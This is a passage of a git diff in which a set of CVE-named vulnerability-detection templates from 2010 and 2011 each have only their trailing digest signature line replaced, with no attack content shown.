4b0a00483046022100920c66762b282d6c429a6237cc74e1f07cbc9f1f47017466dc4ab2cb58981922022100d7f1dd5bb53cc9a4af054cc5c18896b109641110113bc65b96c088183ec4bd15:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1952.yaml b/http/cves/2010/CVE-2010-1952.yaml index a9084f3e555..0bba9d90fb5 100644 --- a/http/cves/2010/CVE-2010-1952.yaml +++ b/http/cves/2010/CVE-2010-1952.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402207fe9dad6416dc5d4e98cb0c6ad1db70f1c40dcd34965705290f47f51cde6e7cc022078757c031023c2e4fdeb33fbad3cc9483639e8f2ef33736678716fbc2ca936c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204ae7274813dd1b082570a5e2dfd4689bc94f803b833c4850acd1ea7d85954bff022018006a6ad72e0801989fcb6ea53a3fca7202c14675a46ed1b6d411d0d43e9f53:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1954.yaml b/http/cves/2010/CVE-2010-1954.yaml index 70b99fe0525..ac992a04bf8 100644 --- a/http/cves/2010/CVE-2010-1954.yaml +++ b/http/cves/2010/CVE-2010-1954.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b4ab76aa0a17588884d7a978f95147e16593839af4aa6897430f0fc8afe06a4802207d456681ff1538613009ec0a6ced7135eb76ddbbcfca6af33110d3f7ad88636e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e70e4e248f592562552298efeebc0057aed29bceaaa42bca8b8530cf30c93ddd0221009635edbea8e212243cdc4615cba719289dccaa4e2732ebe8f7ee07f33f4a4be2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1955.yaml b/http/cves/2010/CVE-2010-1955.yaml index 189e05793cb..ca239c517b1 100644 --- a/http/cves/2010/CVE-2010-1955.yaml +++ b/http/cves/2010/CVE-2010-1955.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022073cab9812d6f8190a441253ec980049d50c2bda838f0472bba23e7578bf0be48022100a1320b14fa4e652d11be4154c1323aef6a09f522cf8150a31611e98d422a691f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fdd48eaa4de802aaa5de2c563623750772d4d81a2fe0956b8434bb2b78f103290220373480117b2b25d880cbb8804b4da80db0bfc374576d51959999c024d6e2738c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1956.yaml b/http/cves/2010/CVE-2010-1956.yaml index 930d27bcc79..165c99ac561 100644 --- a/http/cves/2010/CVE-2010-1956.yaml +++ b/http/cves/2010/CVE-2010-1956.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402202d52856bc633683ce96a4cb59dee531d7e560401219f16e8753ef494f42ed65e02201092da0ee76e871e7200cb4b1a90df3e3a795e8d8c43f84dee9edd93faeb7402:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220353853a6f88c44e4ef86babf508a6ea61fa220fadfa9b80f36994a7e3dd84099022100b095b3e8a946b8727043fbbfd1f0d5778a14c667c745f18277cb61c10dd4b67c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1957.yaml b/http/cves/2010/CVE-2010-1957.yaml index 99f4be431c8..f850a4e2059 100644 --- a/http/cves/2010/CVE-2010-1957.yaml +++ b/http/cves/2010/CVE-2010-1957.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c6f7665693e5187b65d62c88f9c628aa1453fe527af8cb441bf2319e36d5a694022001187c4311ad77a819029fddfbc84d538c65687fbb9c7cac052800e09408a352:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022032a9911f4d74ace74aaf377bffd659af67178c2a2dbe8bec823291c2aa023c75022039ac4d93c221e4e1c6bb8345cabbb9ddd619d2d6f0eddc14ee6b17b76d3e447a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1977.yaml b/http/cves/2010/CVE-2010-1977.yaml index c2495aaeacf..52ed55db5d9 100644 --- a/http/cves/2010/CVE-2010-1977.yaml +++ b/http/cves/2010/CVE-2010-1977.yaml @@ -40,4 +40,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100a6f7ce53e91ca1aea0c42d4c0590d45acb6596c6ae9cf09763948dea12465a9b02205c0660a545007a80d43ec125b87a9eba312931b0fc62af34e667030204287861:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100aad76d562cbb76917cd05983aac739dbd91993152906d5fb7e88bf1a97742b930221008d2d1e0eabb60e1277b14b24e9d3190cbf637b1aed2c60d5c18e3b178f763bd3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1979.yaml b/http/cves/2010/CVE-2010-1979.yaml index 1211a37548c..eab494352dd 100644 --- a/http/cves/2010/CVE-2010-1979.yaml +++ b/http/cves/2010/CVE-2010-1979.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ce17018b552dc8d3620fd29b5a8496e437768ab514e2adfe47d021d96ee0c597022056130e7ee6bde793d019d71b825a5afbb2c6215ccbc6b403a0cf5ec352009c4b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c2a00b7da0269b61b91fd2aa17697e2d1a13ef3b54e7d3fd03e59b75d34db46e0220523865c363ba42218ec55b9dbfecd085a8e8b17b6b6e1d2470888f4b6bed44de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1981.yaml b/http/cves/2010/CVE-2010-1981.yaml index 4f1e3e98bc5..a37a92da285 100644 --- a/http/cves/2010/CVE-2010-1981.yaml +++ b/http/cves/2010/CVE-2010-1981.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b454bdd0cbbec0e7ed73d0ef2ffabe4e7b3cf7ee8d0a053a6211c3c824bf56d502205eb6eeeab36390ddb3d5664c83c2bed988220fc96bfbb2a4e234c3890f42c8d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e761bcf718872bb6043c6155339347e5c485aa054a59f9b775abdc858fa00ec002210090e02b18b200c6bb9072d3ca09d6b82fa904d08bdbf5797d01807843204380a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1983.yaml b/http/cves/2010/CVE-2010-1983.yaml index 2273cd97870..8e0e60975dd 100644 --- a/http/cves/2010/CVE-2010-1983.yaml +++ b/http/cves/2010/CVE-2010-1983.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c99f67bcf62fc2799c53d39468db0c462d91f70ca4b41e6e675611c131bb0588022100d9b394162624f7933aa97bd4e2660788b411e5e974271988cbe7422ab4223836:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022005555703bbd76483376b4101c0ab78c2c9088628589e198cfa51f0ee84002c25022067909d675053ca376222eeb71bd13484b15cb6df5e9edfb58cebf87bc83da024:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2018.yaml b/http/cves/2010/CVE-2010-2018.yaml index 160c04a287e..130431e2acd 100644 --- a/http/cves/2010/CVE-2010-2018.yaml +++ b/http/cves/2010/CVE-2010-2018.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502206a838d7c670fc83fb44f669ee7cfb6809cdd2feaefad4cd76476598b8f9acad5022100c9ff665c852e0c5c5247cc98e51ba32312160319cc4ac34f871fbd38c08bc41d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008bb6f4e3ec57b656fa98b3d7bd2474d535a3338f029ed8ba8fb9e8dc44cead1e02205c16a975dcbfe9a014ad7e3af8947aa3eccf0e3fd996636c5cf3c277d440ec9c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2033.yaml b/http/cves/2010/CVE-2010-2033.yaml index 121b70dfbcf..27906ff6a1d 100644 --- a/http/cves/2010/CVE-2010-2033.yaml +++ b/http/cves/2010/CVE-2010-2033.yaml @@ -40,4 +40,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c77382a966c55e9b071901549b223e8e9328d0b249fc01adb7243565879a3e0f02203727b41041d114ee01560b20e4341f8c612b7270b4a191db6884644f8688c166:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e2a5c9843e8db134a073fa8634eaed0b05e3a5efb773e11e586743312245cc38022100c9d76555387cdd02ff17d05af1a2f16734578f630be98530b7e30771ae4c4bb4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2034.yaml b/http/cves/2010/CVE-2010-2034.yaml index c1ebe2608f7..fc6dabe2053 100644 --- a/http/cves/2010/CVE-2010-2034.yaml +++ b/http/cves/2010/CVE-2010-2034.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221008b6d8884a7aeb8f4c346cdac101c5d32b67229f6d480cb959ff4f7480278b31e02202a30e4b22c8a7663673d8ccd354b53bf868df0145fbf7a20ca441fe6e43aff5c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210087dc0a0429a1796eb62852471aced62873f96f336bf23ec2aa93e69a13128e660220275797159e9b7ab8eb51afcc7d0c4ad6587c215822dae8d83f2d2c0c38e020be:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2035.yaml b/http/cves/2010/CVE-2010-2035.yaml index 80f934872e1..fd5e843c841 100644 --- a/http/cves/2010/CVE-2010-2035.yaml +++ b/http/cves/2010/CVE-2010-2035.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402202d96b8a0c7c212cd2e852b3f1195052e00a4338d8c1aa027e17c4c706963da64022045a956f0e441eab9d89601fea4ef965b3e6d3f74efdf48f58634101495222c95:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100befa6cffb6fdd025f5cb3dd640c6cf5901b9a46a9f912643633c091978acfd6f022100981599bf20ee6c287d099328a51afc1e6ce0f8a71c5ca2e247f7ca8632afee84:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2036.yaml b/http/cves/2010/CVE-2010-2036.yaml index 78884ea636a..1122f99979f 100644 --- a/http/cves/2010/CVE-2010-2036.yaml +++ b/http/cves/2010/CVE-2010-2036.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502201625178c80879136f3a04615b6a626e3df13b610208aa21c427464775263f1e70221008fb5ab428878ecd14a1ba5eb6e322e982478d76b5e61f1d7d47cc76ecbc53ac6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100cf40c1be67adc5ab3775caac2bb0a32c7d71c93bfb813315392dba9fc60ba5fe0220159f050787281db0f44c01cb5bb5f95abb8c0598cb2d3ff3027b66a31ec496c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2037.yaml b/http/cves/2010/CVE-2010-2037.yaml index 168df05d088..b11742be78b 100644 --- a/http/cves/2010/CVE-2010-2037.yaml +++ b/http/cves/2010/CVE-2010-2037.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100883b981a879ca6bc866f287bb28f3419b648ac8806f6328c33481b1fc767097b022100eff2e6a080fda3196fa92f3b2c8bad17a31d4a5085bf3ae9832effa1aa64e601:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203d497453f4bf087e5fc20e5b12c9fc2ff4ee35d394abe99b10736cb5e1ef525402201a08c1a813979d774ae22dbf5ad5cf260909c442c686b2b907c55b97d4bd58ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2045.yaml b/http/cves/2010/CVE-2010-2045.yaml index f6841f47600..81f4e4494fc 100644 --- a/http/cves/2010/CVE-2010-2045.yaml +++ b/http/cves/2010/CVE-2010-2045.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502205ac4910379ff33e0db457a1c42fbddf29eac265830e64d66c49072d46c2ec328022100860e2b553a96a37d244ddf09bc372b20e7da862c4c95e9b09f299cea29348fb8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220534b01c94d3d162d9e575e6fba1d6cc1ae80b6297c6152aeb266dcc15325935302206b03abecd3ceff82bf69db37c50fe66164859d3a8bffbd2769bf823a1ab1034b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2050.yaml b/http/cves/2010/CVE-2010-2050.yaml index 856b96d1b13..ec2be481b00 100644 --- a/http/cves/2010/CVE-2010-2050.yaml +++ b/http/cves/2010/CVE-2010-2050.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402202959bf855462aaf8c6c64d74753b93583fbd3208e76d7d01f36b11c7ed7840fe022019dc6ad0ab735ec14f45e59da391af2c30aea65854c20c33cb4f893f82640ada:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100950284bd840997c928b81c32b7809b69b3395d7e0ea718557175e16f8cb12c59022100c39611b4cad116ccfcea19506026a30b238806d27580b2dd2c155a3cfa8e1610:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2122.yaml b/http/cves/2010/CVE-2010-2122.yaml index 370fa164339..bebd15b8a82 100644 --- a/http/cves/2010/CVE-2010-2122.yaml +++ b/http/cves/2010/CVE-2010-2122.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502207d5edac98e3b37fa2fe34508b004e4b9b2dbb28b5eb8b42ad9b3cdf379a51f0c0221009b4c36547c395725f712a955b6f36c80a38ac311c00738e3fa8525740e9615fe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207099b2d4b520b0cf90ff0cda6cc385845aaadfb5f037c97724c9f4a6b2d79c79022059334e9aa232133e7a3d43030c804183c19ef40128ff06fc983e4e61a97c20b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2259.yaml b/http/cves/2010/CVE-2010-2259.yaml index 99bf3aaacb6..0b2f541f4ce 100644 --- a/http/cves/2010/CVE-2010-2259.yaml +++ b/http/cves/2010/CVE-2010-2259.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022020c8f91a0c29fa79ccf594db399dc8f0356ef75cc94aa96c441e3233203f594f0221009187ef3dc79c38eb49013923d8cb9f562b64d4b50f6710a6344ec23bce90a1c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a8712cace0503e6f2415cc1a251979953d94d4afce8b6de1e413ff1d26b8c134022100e90e6854edb7de2cded159fe6327bf6f3dfb4474a88fb6b760f3b77d86e21978:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2307.yaml b/http/cves/2010/CVE-2010-2307.yaml index e7383c4cfd6..dcbbd5b131b 100644 --- a/http/cves/2010/CVE-2010-2307.yaml +++ b/http/cves/2010/CVE-2010-2307.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100a709d6486eef2c560ef7623715aa0bb2855cb7a5540e3b71ce55a4ca3cf66d590220093e07b8c25eb7d3438c77025038968f7d6249ce43596641011d2bb906d5fc35:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f0428102a2a53713be3196b59528da45eddd5c8c09c3df0e177099aa50bca4dc022023496be2b8406ad6953710a5111c2b5838d86c4812a87bcd2893760ea13527e3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2507.yaml b/http/cves/2010/CVE-2010-2507.yaml index 675c7e6d51c..bf353941930 100644 --- a/http/cves/2010/CVE-2010-2507.yaml +++ b/http/cves/2010/CVE-2010-2507.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502207be37764b2903839fad13d2926cc246a8d85a01d09a516cc8e639eed18221a8f022100b75a4b752e715da7894657b2c17ebbcc490f59f02f6ae30577398f38478aea23:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100eead1c6b1df90949befb60740cdc3f83e239397eee19fffec08d989f7a7926d60220135afb5d774c07de31cccf6642c47b49a8b1b2a5ab2d980002a8f7a4948e687c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2680.yaml b/http/cves/2010/CVE-2010-2680.yaml index 66f0ec94767..d6aa99adc4d 100644 --- a/http/cves/2010/CVE-2010-2680.yaml +++ b/http/cves/2010/CVE-2010-2680.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100cb64081acbc519d90903a78e5ad409ae264c07b618b583c0858d7a605770ac1c02203d8a6f8b75137e573c4602e01393d1cdf6f3b995a7523c228326d51217f53809:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210098a058ac825a317a89da48855a1e491bc4a5d24becf8928ec84c1ebab500bcaa022100c634404285862bf773c7ac9ef860a076d324964cb59ef796418bb6e542da23e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2682.yaml b/http/cves/2010/CVE-2010-2682.yaml index f3ab85d5bd7..891d736c8d1 100644 --- a/http/cves/2010/CVE-2010-2682.yaml +++ b/http/cves/2010/CVE-2010-2682.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022065eade9b078a51e6a800da73d1e47caff1ef3a763caa198e4c83bfc47069b60d022100bc2f7313d9669def08851b0aced314219a4814b302acdb8752024e57db81ee62:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022072a4e14f35cd1a1a90d13ca4b0f19914320507175b8483245c4dbbc0951c301e022009fb93ba001be8aad2be13f27d3b8e28cb678ad19ce43b822651c43bf263e156:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2857.yaml b/http/cves/2010/CVE-2010-2857.yaml index 9723778f909..54fea923344 100644 --- a/http/cves/2010/CVE-2010-2857.yaml +++ b/http/cves/2010/CVE-2010-2857.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221009f41018e3b45e720db35d0805cfda5ecf43067d87ae5ee33a2c2e3d6e06ca28402202e5cdc38146316f5ed8f9dd934c216434bfae08a0f08d323889c48cd79aa0d67:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022050a03b9dc384a1b1af8b7b72635b68295be33f6857856300518db641e17b891e0221008124fed5e4e0948703427b0bb37fa7ed4bcfd09e25689aae10399ec5899fad96:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2861.yaml b/http/cves/2010/CVE-2010-2861.yaml index 52fe252f3dc..40346984c2f 100644 --- a/http/cves/2010/CVE-2010-2861.yaml +++ b/http/cves/2010/CVE-2010-2861.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100f301cc3ce6be756d506e27d048d3938057cef7d72e45399babd7721faf353c17022074cd0f93ff5b6250e711a503a717659e95f2bb9f268bea48c52d5269dda23b04:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fab501efca527aa92652d971b75dd8f154836cd8fbe1edc7a3e3909f56c343f002202afe1b1d1d6cce007b2e08037dae20b5b82db9d3c4a775a114736d58df8acaf3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2918.yaml b/http/cves/2010/CVE-2010-2918.yaml index 0d17cc68879..5608a835737 100644 --- a/http/cves/2010/CVE-2010-2918.yaml +++ b/http/cves/2010/CVE-2010-2918.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210088970984bf73a53dfe20a6b2d97bee8f6f8a6934926512496d84e8492678be3602207f032d46df3484a29553d6f862a43f487cd20d42a9e2ea1c635dda8c731a6503:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022070b6902e5838f19597f0a99a096ec8bf41a930b83f82d2bef1dda08d0d1585ae02206df72e3f12b2c5402bc5e011f1ea5154ef3b11b82e70841bc28823ccdc5d1902:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-3203.yaml b/http/cves/2010/CVE-2010-3203.yaml index 21de872de61..9b2619c607a 100644 --- a/http/cves/2010/CVE-2010-3203.yaml +++ b/http/cves/2010/CVE-2010-3203.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100b9b3860d6d13bef9f68a5a2d0f7d088ac7a26276aac4be431b4f710d857bd60b022100a446235d8967f217ad06f66eee5a448d90f2121eb6883f39b4434efc03d79ea0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202f5ba726b7934d9bdea40afa236465b33c3bf2b56f28f796adf3d8965af7620102206329c2708ebd5a808f689dceaa02f67e976431e948a5a8fcf6123273c1c9ee17:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-3426.yaml b/http/cves/2010/CVE-2010-3426.yaml index 7f7b3a0f2cd..3c89c3527b7 100644 --- a/http/cves/2010/CVE-2010-3426.yaml +++ b/http/cves/2010/CVE-2010-3426.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c0297fa36659cfa544d07b726d70431a73552085f0db74178c230d0c6f645fe00220535a10a7433e43d69042eb63d9cb5f28b1012a2bad6a1aceef967cbe6fc60de7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220011c1d4109c028f2a9583c9bf93ee4b1d473e80031cdde3a5232e2cd9fe2e959022100ae19f12c2b5fba9afbf9d20b718be148f07e7ef4dc4ddd145a490bdd99fa6856:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-4231.yaml b/http/cves/2010/CVE-2010-4231.yaml index 6c5ccc7450d..12fe7f97dd8 100644 --- a/http/cves/2010/CVE-2010-4231.yaml +++ b/http/cves/2010/CVE-2010-4231.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ddfadd45bbec94459a37de5d91cc1aa613ceb9f475eb4d99633f31350e5fd927022100dd840b2e68cbd4210a55411e8329e6efb388645d06193ed31e05bd6f8a4f14bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022063549379ac374defac8d0f2b38dc132b0704ce5278b870f6a744b3b88e4d500a022037afaf4cefadffb24a20b3000006b934d41781932b9524050df6c3ece12fff38:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-4239.yaml b/http/cves/2010/CVE-2010-4239.yaml index 6f8000d57ef..891720d77f7 100644 --- a/http/cves/2010/CVE-2010-4239.yaml +++ b/http/cves/2010/CVE-2010-4239.yaml @@ -44,4 +44,4 @@ http: - "fonts" - "extensions" condition: and -# digest: 490a00463044022030bbf9f108eb4c38b708e02f0b212a946e5bf564b5fe3c74b3336b85c73e519f02202aa2083e3ff29d9b3d572433d142fd97dadcd98f7f050240031906ce9ae79a1a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100aed624b622488f9da63826b60211df3a175033631cd9494cac1014e926a2165502203b942d3173893853bb519a031d545d03efa1dfe347d51e418cd7187d9d6481be:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-4617.yaml b/http/cves/2010/CVE-2010-4617.yaml index c628e8f3bd5..a97f02b35ff 100644 --- a/http/cves/2010/CVE-2010-4617.yaml +++ b/http/cves/2010/CVE-2010-4617.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220347bd47b07c1e605a0ea88914798c6916fb2b6e11257221c557b5bd91e60bfa0022100ca3d77e44288b219b81858546d4e9f0daa9a2ecdbcb34518c055bab00d986450:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100cb991299b17ab800e524f7cd544c556769abbb0a540a082e30a7c9d2eeb92d10022100b8ce6bb75596009dc7387f7b3fede19893c91c56f84b816c0eb5bcc57b88ec2a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-4719.yaml b/http/cves/2010/CVE-2010-4719.yaml index 459e8e2449a..e586f033ba7 100644 --- a/http/cves/2010/CVE-2010-4719.yaml +++ b/http/cves/2010/CVE-2010-4719.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221009af31ef9f092167802e5b2c3a04fe9d83783288509ca8e4b175f48994beb8fa6022100f25cea85b589827ecad9df0f90d9cc5bfc6d5c2b5b104ca581184a0fa78061d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205c913257c3ed089649edbfb04f39103a3a4e6849f874a3d41d6aaaa6883c3fc4022045e3ff673bffcd7b23ff6e8d77b0d57e6568c4629a02b75e71d0d05c46056896:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-4977.yaml b/http/cves/2010/CVE-2010-4977.yaml index 4f6cd5fca36..2f65c4e4984 100644 --- a/http/cves/2010/CVE-2010-4977.yaml +++ b/http/cves/2010/CVE-2010-4977.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d5530e90752614dcaa3fbfeecd7426b74c60964ce654825fc6f9a39913ca63d3022100fb78bbeaeffe986bb11f2338f9e6ea24dee3b4683b6acd3b669d7f4c7e804e08:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206c666f512d988e48477c2038c3a25c205773843a57f664a5e8063d9629cb45d202205ad81745b31b08194d6cffc1ede9096635f856f0fc16e324c9fccdabe3be0182:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-5028.yaml b/http/cves/2010/CVE-2010-5028.yaml index 1e632079ca5..28b6cde073b 100644 --- a/http/cves/2010/CVE-2010-5028.yaml +++ b/http/cves/2010/CVE-2010-5028.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220408b700bbef021ada176d828fa86fc4fce9230d9988f40b4cef64ec0962e88d5022100e6c11b147f7197246163272406c92e60b0082a924c368e677eb428042c18acc4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204253ce3175dfd6b55eafa7b189a50c52a0d24c272afd6ba33ecba98a2740ab64022078d35c2f2352ccb84c42bda1174e0db2bcdd9109db3efbbf51d6ed159f750c14:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-0049.yaml b/http/cves/2011/CVE-2011-0049.yaml index 53b8480f3b6..eb8b8988c56 100644 --- a/http/cves/2011/CVE-2011-0049.yaml +++ b/http/cves/2011/CVE-2011-0049.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502203fd7cf79eeca5158acf914ca8ab6bebe34574eea59a7117d159facef6b31939d022100e867aff90fc9df152299ceb518afdb6b9b1eb369df4eab9777690dd1b67f1dff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022005fa21eed6c6ca6039764e972aa0d7bbf0e0bff8d3acbad1c760f86069b262020220162df8562477105a458162a615761f8601c69b49c66979c8bd5616e997277067:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-1669.yaml b/http/cves/2011/CVE-2011-1669.yaml index 467eed02ceb..508939d7f57 100644 --- a/http/cves/2011/CVE-2011-1669.yaml +++ b/http/cves/2011/CVE-2011-1669.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100a7d3234d7533f55d3281dbfb72814ada50a4b7b374fd32e26bd00da776cac93b022100c73899be6bca879860512b3447ef5c00762a2dd4546e47a6a1e6256f134bf237:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f56ca26a2deaefd7e485524df5daf1de9f10efe6e451c09dc612fdc58fcb54e502203b1769f10df972a45c747d1402dc94e0930a3b7177701492b0b4e8fd9907b8ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-2744.yaml b/http/cves/2011/CVE-2011-2744.yaml index 79a1c595881..f1cd9f0d876 100644 --- a/http/cves/2011/CVE-2011-2744.yaml +++ b/http/cves/2011/CVE-2011-2744.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 